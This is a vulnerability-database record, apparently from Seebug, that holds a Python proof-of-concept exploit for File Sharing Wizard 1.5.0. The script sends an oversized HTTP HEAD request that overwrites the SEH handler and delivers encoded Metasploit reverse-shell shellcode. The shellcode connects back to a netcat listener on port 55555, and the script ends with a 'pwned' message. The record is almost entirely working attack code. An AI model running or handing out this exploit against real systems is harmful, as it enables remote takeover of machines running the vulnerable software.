Description
No description provided by source.
{"sourceData": "\n #!/usr/bin/python\r\n \r\n \r\nprint "\\n##########################################################"\r\nprint "## Team Hackers Garage ##"\r\nprint "## (www.garage4hackers.com) ##"\r\nprint "## ##"\r\nprint "## File Sharing Wizard Version 1.5.0 ##"\r\nprint "## Remote Command Execution ##"\r\nprint "## Author: b0nd ##"\r\nprint "## (sumit.iips@gmail.com) ##"\r\nprint "## ##"\r\nprint "## Greetz to: The Hackers Garage Family ##"\r\nprint "## Thanks to: www.exploit-db.com/author/m1k3/ ##"\r\nprint "## ##"\r\nprint "## & ##"\r\nprint "## ##"\r\nprint "## Peter Van (CORELAN TEAM) ##"\r\nprint "## ##"\r\nprint "###########################################################"\r\n \r\n \r\n# http://www.sharing-file.net/\r\n# File Sharing Wizard Version 1.5.0 build on 26-8-2008\r\n \r\n# Summary: The "HEAD" command leads to SEH overwrite and ultimately remote system compromise\r\n# Tested on: Windows XP SP2\r\n# SEH Overwrite and shellcode pointed out by EBP\r\n# Huge space for shellcode.\r\n \r\n \r\nimport socket\r\nimport sys\r\n \r\nif len(sys.argv) < 2:\r\n print "Usage: exploit-code.py <Remote-IP-Address> <Remote-Port>"\r\n sys.exit(1)\r\n \r\nips = sys.argv[1]\r\nport = int(sys.argv[2])\r\n \r\n \r\nstring = "A"*1040\r\nstring += "\\x90\\x90\\x1d\\xeb" # nSEH --> Jump to Shellcode\r\nstring += "\\x29\\xE3\\xD3\\x74" # pop pop ret from oledlg.dll (SafeSEH OFF)\r\nstring += "\\x90"*16 # Nop's\r\n \r\n#win32_reverse - EXITFUNC=seh LHOST=192.168.96.1 LPORT=55555 Size=649 Encoder=PexAlphaNum http://metasploit.com */\r\n#Thumb rule - Don't trust the shellcode ;)\r\nstring += ("\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49" +\r\n"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36" +\r\n"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34" +\r\n"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41" +\r\n"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x56\\x4b\\x4e" +\r\n"\\x4d\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x36\\x4b\\x38" +\r\n"\\x4e\\x56\\x46\\x42\\x46\\x32\\x4b\\x48\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x47" +\r\n"\\x45\\x30\\x4a\\x37\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x31\\x4b\\x48" +\r\n"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x53\\x4b\\x38" +\r\n"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x38\\x42\\x4c" +\r\n"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e" +\r\n"\\x46\\x4f\\x4b\\x53\\x46\\x45\\x46\\x42\\x4a\\x32\\x45\\x47\\x45\\x4e\\x4b\\x38" +\r\n"\\x4f\\x35\\x46\\x32\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x50\\x4b\\x34" +\r\n"\\x4b\\x58\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\\x4e\\x32\\x4b\\x48" +\r\n"\\x49\\x48\\x4e\\x56\\x46\\x42\\x4e\\x31\\x41\\x36\\x43\\x4c\\x41\\x53\\x4b\\x4d" +\r\n"\\x46\\x46\\x4b\\x58\\x43\\x54\\x42\\x53\\x4b\\x48\\x42\\x54\\x4e\\x50\\x4b\\x48" +\r\n"\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x38\\x42\\x54\\x4a\\x30\\x50\\x55\\x4a\\x36" +\r\n"\\x50\\x58\\x50\\x54\\x50\\x50\\x4e\\x4e\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x48\\x36" +\r\n"\\x43\\x45\\x48\\x36\\x4a\\x36\\x43\\x43\\x44\\x53\\x4a\\x36\\x47\\x57\\x43\\x57" +\r\n"\\x44\\x53\\x4f\\x35\\x46\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e" +\r\n"\\x4e\\x4f\\x4b\\x43\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x58\\x45\\x4e" +\r\n"\\x48\\x56\\x41\\x38\\x4d\\x4e\\x4a\\x30\\x44\\x30\\x45\\x55\\x4c\\x36\\x44\\x50" +\r\n"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x55" +\r\n"\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x43\\x55\\x43\\x55\\x43\\x55\\x43\\x44\\x43\\x55" +\r\n"\\x43\\x44\\x43\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x42\\x4c\\x4a\\x4a\\x42\\x56" +\r\n"\\x41\\x50\\x48\\x56\\x4a\\x36\\x49\\x4d\\x43\\x50\\x48\\x36\\x43\\x45\\x49\\x38" +\r\n"\\x41\\x4e\\x45\\x59\\x4a\\x46\\x4e\\x4e\\x49\\x4f\\x4c\\x4a\\x42\\x56\\x47\\x35" +\r\n"\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x42\\x41\\x41\\x55\\x45\\x35\\x4f\\x4f\\x42\\x4d" +\r\n"\\x48\\x56\\x4c\\x46\\x46\\x36\\x48\\x36\\x4a\\x46\\x43\\x36\\x4d\\x56\\x4c\\x46" +\r\n"\\x42\\x55\\x49\\x35\\x49\\x52\\x4e\\x4c\\x49\\x58\\x47\\x4e\\x4c\\x36\\x46\\x54" +\r\n"\\x49\\x58\\x44\\x4e\\x41\\x33\\x42\\x4c\\x43\\x4f\\x4c\\x4a\\x45\\x39\\x49\\x48" +\r\n"\\x4d\\x4f\\x50\\x4f\\x44\\x44\\x4d\\x42\\x50\\x4f\\x44\\x44\\x4e\\x52\\x4d\\x48" +\r\n"\\x4c\\x47\\x4a\\x33\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x36\\x44\\x57\\x50\\x4f" +\r\n"\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x57\\x4a\\x42\\x4f\\x4f\\x48\\x4d\\x4b\\x55" +\r\n"\\x47\\x45\\x44\\x35\\x41\\x55\\x41\\x55\\x41\\x35\\x4c\\x46\\x41\\x30\\x41\\x45" +\r\n"\\x41\\x35\\x45\\x35\\x41\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4d\\x4a\\x49\\x4d" +\r\n"\\x45\\x50\\x50\\x4c\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x4f\\x4f\\x4f\\x4f" +\r\n"\\x47\\x53\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x47\\x4e\\x49\\x57\\x48\\x4c\\x49\\x47" +\r\n"\\x4f\\x4f\\x45\\x57\\x46\\x50\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x47\\x47\\x4e\\x4f" +\r\n"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x35\\x43\\x45" +\r\n"\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x42\\x4d\\x5a");\r\n \r\nstring += "D"*4000 # Some more junk\r\n \r\nprint "Launching remote BoF on", ips\r\nprint ""\r\n \r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\ntry:\r\n connect=s.connect((ips, port))\r\nexcept:\r\n print "no connection possible"\r\n sys.exit(1)\r\n \r\nprint "\\r\\nsending payload"\r\nprint "..."\r\n \r\npayload = (\r\n'HEAD %s HTTP/1.0\\r\\n'\r\n'\\r\\n') % (string)\r\n \r\n \r\ns.send(payload)\r\ns.close()\r\n \r\nprint "Check your netcat listening on TCP port 55555 for reverse connect shell\\n"\r\nprint "%s pwned!" % (ips)\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19813", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-19813", "type": "seebug", "viewCount": 25, "references": [], "lastseen": "2017-11-19T18:11:31", "published": "2010-06-18T00:00:00", "cvelist": [], "id": "SSV:19813", "enchantments_done": [], "modified": "2010-06-18T00:00:00", "title": "File Sharing Wizard Version 1.5.0 (SEH) Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645292052}}
{}